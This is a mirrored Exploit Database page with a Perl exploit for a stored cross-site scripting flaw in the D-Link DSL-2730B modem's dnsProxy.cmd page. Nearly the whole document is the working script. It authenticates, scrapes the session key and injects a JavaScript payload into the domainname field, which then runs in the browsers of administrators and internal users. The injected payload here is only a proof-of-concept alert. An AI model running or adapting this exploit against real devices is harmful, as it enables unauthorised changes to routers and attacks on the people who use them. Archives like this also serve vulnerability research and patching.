D-Link DSL-2730B Modem – Cross-Site Scripting Injection Stored DnsProxy.cmd

• Exploit Database
• 124 阅读

• 作者： XLabs Security
  日期： 2015-01-11
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/35750/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139

  # Exploit Title: D-Link DSL-2730B Modem dnsProxy.cmd Exploit XSS Injection Stored # Date: 11-01-2015 # Exploit Author: Mauricio Correa # Vendor Homepage: www.dlink.com # Hardware version: C1 # Version: GE 1.01 # Tested on: Windows 8 and Linux     #!/usr/bin/perl # # Date dd-mm-aaaa: 11-11-2014 # Exploit for D-Link DSL-2730B # Cross Site Scripting (XSS Injection) Stored in dnsProxy.cmd # Developed by Mauricio Corrêa # XLabs Information Security # WebSite: www.xlabs.com.br # More informations: www.xlabs.com.br/blog/?p=339 # # CAUTION! # This exploit enable some features of the modem, # forcing the administrator of the device, accessing the page to reconfigure the modem again, # occurring script execution in the browser of internal network users. # # Use with caution! # Use at your own risk! #   use strict; use warnings; use diagnostics; use LWP::UserAgent; use HTTP::Request; use URI::Escape;     my $ip = $ARGV[0]; my $user = $ARGV[1]; my $pass = $ARGV[2];   $ip = $1 if($ip=~/(.*)\/$/);   if (@ARGV != 3){ print "\n"; print "XLabs Information Security www.xlabs.com.br\n"; print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in dnsProxy.cmd\n"; print "Developed by Mauricio Correa\n"; print "Contact: mauricio\@xlabs.com.br\n"; print "Usage: perl $0 http:\/\/host_ip\/ user pass\n";   }else{   print "XLabs Information Security www.xlabs.com.br\n"; print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in dnsProxy.cmd\n"; print "Developed by Mauricio Correa\n"; print "Contact: mauricio\@xlabs.com.br\n"; print "[+] Exploring $ip\/ ...\n";   my $payload = "%27;alert(%27XLabsSec%27);\/\/";   my $ua = new LWP::UserAgent;   my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );     $hdrs->authorization_basic($user, $pass);   chomp($ip);   print "[+] Preparing...\n";   my $url = "$ip/dnsProxy.cmd?enblDproxy=1&hostname=Broadcom&domainname=A"; my $req = new HTTP::Request("GET",$url,$hdrs);   print "[+] Prepared!\n";   print "[+] Requesting...\n";   my $resp = $ua->request($req);   if ($resp->is_success){   print "[+] Successfully Requested!\n";   my $resposta = $resp->as_string;   print "[+] Obtain session key...\n"; my $token = ""; if($resposta =~ /sessionKey=(.*)\';/){ $token = $1; print "[+] Session key found: $token\n"; }else{ print "[-] Session key not found!\n"; exit; }     print "[+] Preparing exploit...\n"; my $url_and_xpl = "$ip/dnsProxy.cmd?enblDproxy=1&hostname=Broadcom&domainname=XSS$payload&sessionKey=$token";   $req = new HTTP::Request("GET",$url_and_xpl,$hdrs);   print "[+] Prepared!\n";   print "[+] Exploiting...\n"; my $resp2 = $ua->request($req);   if ($resp2->is_success){   my $resultado = $resp2->as_string; if(index($resultado, uri_unescape($payload)) != -1){   print "[+] Successfully Exploited!"; }else{   print "[-] Not Exploited!";   } }   }else {   print "[-] Ops!\n"; print $resp->message; } }